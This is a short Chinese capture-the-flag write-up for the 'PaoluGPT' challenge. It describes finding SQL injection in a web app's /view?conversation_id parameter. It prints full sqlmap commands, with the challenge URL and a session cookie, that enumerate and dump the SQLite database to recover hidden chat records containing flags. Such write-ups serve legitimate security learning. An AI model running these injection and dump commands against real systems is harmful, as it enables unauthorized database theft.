PaoluGPT——窥视未知

上一题已经得到一个flag,还有一个flag

根据题目信息,说明还有一些聊天记录是没有公开的,另一个flag就在这些未公开的聊天记录中


下载题目附件看看,发现里面有个main.py

可以看到有两条SQL查询语句,猜测应该需要利用SQL漏洞来获取flag


丢给AI分析一下:

/list 路由:显示所有已经被标记为可见(shown = true)的消息列表。

使用render_template函数渲染list.html模板文件,并将消息列表传递给模板,以便在前端页面上显示。

/view 路由

功能:此路由用于查看特定消息的详细信息。

通过request.args.get("conversation_id")从URL查询字符串中获取conversation_id参数,该参数应该是用户想要查看的消息的唯一标识符,将查询结果转换成一个Message对象,并将其传递给view.html模板进行渲染,以展示消息的具体内容


本来想手工注入的,但突然想起来可以用sqlmap:

python sqlmap.py -u "https://chal01-jjwftkqu.hack-challenge.lug.ustc.edu.cn:8443/view?conversation_id=4deef159-85f8-4522-b796-4b681f406f3f" --cookie "session=eyJ0b2tlbiI6IjUzMTpNRVlDSVFESEw5ZHY2clBoWlhEN2tUcXNOUWhPQ01ka1NEbVE5bHdmV0NHbEpHWDlXd0loQUlSeWV2cmRrb0xuS2FIREJEblVDQURROVl0MFI2bmY1aXJtNWhRd0RUaUkifQ.ZzXy1Q.WpTGLGFc9VkFG-qmlzSOnqBjJag" --dbs


cookie值:


扫出来数据库名是SQLite

python sqlmap.py -u "https://chal01-jjwftkqu.hack-challenge.lug.ustc.edu.cn:8443/view?conversation_id=4deef159-85f8-4522-b796-4b681f406f3f" --cookie "session=eyJ0b2tlbiI6IjUzMTpNRVlDSVFESEw5ZHY2clBoWlhEN2tUcXNOUWhPQ01ka1NEbVE5bHdmV0NHbEpHWDlXd0loQUlSeWV2cmRrb0xuS2FIREJEblVDQURROVl0MFI2bmY1aXJtNWhRd0RUaUkifQ.ZzXy1Q.WpTGLGFc9VkFG-qmlzSOnqBjJag" -D SQLite --dump


查询的过程中会发现一大堆字符串在浮动,看不过来,但没事,直接去对应的记录文件中查询关键字"flag":

可以看到,一下子找到两个flag了

相关推荐
枫眠QAQ20 小时前
hackthebox Editor靶机:从配置文件泄露密码到提权
安全·web安全·网络安全
white-persist20 小时前
轻松抓包微信小程序:Proxifier+Burp Suite教程
前端·网络·安全·网络安全·微信小程序·小程序·notepad++
特别关注外国供应商1 天前
Claroty 获1.5 亿美元融资,发展CPS安全平台
网络安全·工控安全·物联网安全·工业网络安全·claroty·iiot安全·cps安全
十月南城1 天前
压测方法论——目标、场景、指标与容量评估的闭环
运维·web安全·ci/cd·微服务·云计算
工程师华哥1 天前
【零基础学网络】AAA原理详解 + 实战配置(华为设备版)
网络安全·路由器·网络工程师·运维工程师·aaa·华为数通认证·路由交换技术
上海控安1 天前
智能网联汽车对外通信安全概述
网络安全·汽车
内心如初1 天前
10_等保系列之等保2.0基本要求
网络安全·等保测评·等保测评从0-1·等保测评笔记
heze091 天前
sqli-labs-Less-23
数据库·mysql·网络安全
吉吉611 天前
ThinkPHP5.0.15框架注入复现详细过程
web安全·php·安全性测试
上海控安1 天前
蓝牙协议栈架构概述
网络安全·架构